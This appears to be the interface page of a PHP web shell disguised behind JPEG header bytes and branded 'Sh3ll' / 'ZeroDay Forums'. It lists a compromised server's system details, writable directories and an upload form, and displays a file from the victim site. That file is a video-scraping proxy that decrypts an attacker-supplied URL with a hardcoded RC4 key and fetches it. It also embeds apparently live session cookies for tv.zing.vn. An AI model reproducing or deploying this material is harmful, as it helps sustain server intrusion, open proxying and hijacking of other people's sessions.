ÿØÿàJFIFÿÛ„ ( %"1"%)+...383,7(-.- 404 Not Found
Sh3ll
OdayForums


Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.20
System : Linux st2.domain.com 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 7.4.20
Disable Function : NONE
Directory :  /var/www/html/st2/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/www/html/st2/stream5.php
<?php
function str_encode($data,$pwd)
{
    $x = 0;
    $a = 0;
    $j = 0;
    $Zcrypt = '';
    $pwd_length = strlen($pwd);
    for ($i = 0; $i < 255; $i++) {
        $key[$i] = ord(substr($pwd, ($i % $pwd_length)+1, 1));
        $counter[$i] = $i;
    }
    for ($i = 0; $i < 255; $i++) {
        $x = ($x + $counter[$i] + $key[$i]) % 256;
        $temp_swap = $counter[$i];
        $counter[$i] = $counter[$x];
        $counter[$x] = $temp_swap;
    }
    for ($i = 0; $i < strlen($data); $i++) {
        $a = ($a + 1) % 256;
        $j = ($j + $counter[$a]) % 256;
        $temp = $counter[$a];
        $counter[$a] = $counter[$j];
        $counter[$j] = $temp;
        $k = $counter[(($counter[$a] + $counter[$j]) % 256)];
        $Zcipher = ord(substr($data, $i, 1)) ^ $k;
        $Zcrypt .= chr($Zcipher);
    }
    return $Zcrypt;
}

if(!isset($_GET['time'])){
    return;
}

/*$time = $_GET['time'];
$time_check = time()-5;
$time_check2 = time()+5;
if($time < $time_check){
    return;
}
if($time > $time_check2){
    return;
}*/


require 'src/Curl/ArrayUtil.php';
require 'src/Curl/CaseInsensitiveArray.php';
require 'src/Curl/Curl.php';
require 'src/Curl/Decoder.php';
require 'src/Curl/MultiCurl.php';
use \Curl\Curl;

// curl --request GET "https://httpbin.org/get?key=value"
$url_encode = trim($_GET['url']);
$url = str_encode(hex2bin($url_encode),'123Vid@Net');

//$url = trim($_GET['url']);

$curl = new Curl();
$headers = array(
    'Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
    'Accept-Encoding:gzip',
    'Accept-Language:en-US,en;q=0.8',
    'Cache-Control:max-age=0',
    'Connection:keep-alive',
    'Cookie: __zi=3000.SSZzejyD0jSbZQcztqW0Wpl3fwMS51A99D7bjue7KPvZdEQtmajId6wRuVpBILFLQ9dd_Sj6KzWt.1; _ga=GA1.2.981028368.1575770946; __utma=1.981028368.1575770946.1605443193.1605615254.39; __utmz=1.1581602969.25.3.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); fpsend=148668; fuid=c99ac881f9a1a927cf190d2d4a708e02; cto_bundle=6XfvJF9QWUVxWGRIJTJCeDE2VXFXR0hhMTdQbnhXNXFHcWRaNVlCZ3o1bFVlTEUxQTdtZ3VHJTJGOHRzMXlSMWtJbmx3MnlqSXI5ZUVkT2E1MnBzSUN3TmlOTGp2ZE93bGZTZjVkMm5sbWsyaTNYd0x4OW9RblMlMkZSUWtSaXlPM3c1cXhLbGR1dFl5c3M2TFMlMkZNNmFzV1RFWDZ5REprUSUzRCUzRA; _fbp=fb.1.1595119985158.1768619689; zpsid=eMqpTboXOpk8OMy11EbaLvPYRGm3xdrTZn8M3Hg562M8SX8XOezVAFK79deOz7meoWyc70NnLIVV234S4UG_5CiCQpumn38unqzD4LQuFnV4JpKH; zpsidleg=eMqpTboXOpk8OMy11EbaLvPYRGm3xdrTZn8M3Hg562M8SX8XOezVAFK79deOz7meoWyc70NnLIVV234S4UG_5CiCQpumn38unqzD4LQuFnV4JpKH; tv_sid=ZxFAIU8AC7cHiCX4vGqfSuZ0iqNyPamBZw2tQOHi2mRorOCo_XSe1itTWrJZ4W49sDgKLFS7QphCtivsrYTc5i2Tw5cmMsivmvsGMQvYAGDpQMG; visitorID=3000.SSZzejyD0jSbZQcztqW0Wpl3fwMS51A99D7bjue7KPvZdEQtmajId6wRuVpBILFLQ9dd_Sj6KzWt.1; adtimaUserId=3000.SSZzejyD0jSbZQcztqW0Wpl3fwMS51A99D7bjue7KPvZdEQtmajId6wRuVpBILFLQ9dd_Sj6KzWt.1; _zlang=vn; atmpv=3; _gid=GA1.2.654226377.1605615254; __utmb=1.0.10.1605615254; __utmc=1; _gat=1',
    'Host:tv.zing.vn',
    'Referer:http://tv.zing.vn/',
    'Upgrade-Insecure-Requests:0',
    'User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'
);
$curl->setOpt(CURLOPT_HTTPHEADER , $headers);
$curl->setOpt(CURLOPT_REFERER , 'http://tv.zing.vn/');
$curl->setOpt(CURLOPT_COOKIEFILE , 'cookies-tv-zing-vn.txt');
$curl->setOpt(CURLOPT_COOKIEJAR , 'cookies-tv-zing-vn.txt');
$curl->setOpt(CURLOPT_RETURNTRANSFER , true);
$curl->setOpt(CURLOPT_ENCODING , "gzip");
$curl->setOpt(CURLOPT_FOLLOWLOCATION , true);
$curl->get($url);
$content = $curl->response;
$curl->close();

/*echo $content;
exit();*/

preg_match_all('#playlist\.source = "(.*?)";#is', $content, $match);
$link = $match[1][count($match[1])-1];
$type = 'video/mp4';
foreach ($match[1] as $key=>$val){
    if(strpos($val,'.m3u8')!==false){
        $link = $val;
        $type = 'application/x-mpegURL';
    }
}

if($type=='video/mp4'){
    $v = str_replace(array('https://','http://','//'),array('','','https://'),$link);
    /*$arr = get_headers($v,true);
    if(is_array($arr['Location'])){
        $v = $arr['Location'][0];
    }else{
        $v = $arr['Location'];
    }*/
    if(strpos($v,'https://')===false){
        $v = 'https://'.$v;
    }
    $link_encode = bin2hex(str_encode($v, '123Vid@Net'));
    $link = 'mp4-6.php?url='.$link_encode;
}else{
    $v = str_replace(array('https://','http://','//'),array('','','https://'),$link);
    if(strpos($v,'https://')===false){
        $v = 'https://'.$v;
    }
    $link_encode = bin2hex(str_encode($v, '123Vid@Net'));
    $link = 'playlist-6.php?url='.$link_encode;
}
?>
<html style="width: 100%; height: 100%"><head>
    <title>-Server 2 embed-</title>
    <base href="https://st2.vidoe.top/">
    <style type="text/css">
        body {
            background: #000000;
            margin: 0px;
            padding: 0px;
        }
    </style>
    <link href="proxy/js/video-js.css" rel="stylesheet" type="text/css" />
    <link href="proxy/js/vsg-skin.css" rel="stylesheet" type="text/css" />
    <script src="proxy/js/video.js"></script>
    <script src="proxy/js/videojs-contrib-hls.js"></script>
</head>

<body style="width: 100%; height: 100%" oncontextmenu="return false;">
<video autoplay controls id="ht_player" style="width: 100%; height: 100%" class="video-js vjs-default-skin"
       preload="auto" poster="" data-setup="{ }">
    <source src="<?php echo $link; ?>" type='<?php echo $type; ?>'/>
    <p>Video Playback Not Supported</p>
</video>
</body></html>

ZeroDay Forums Mini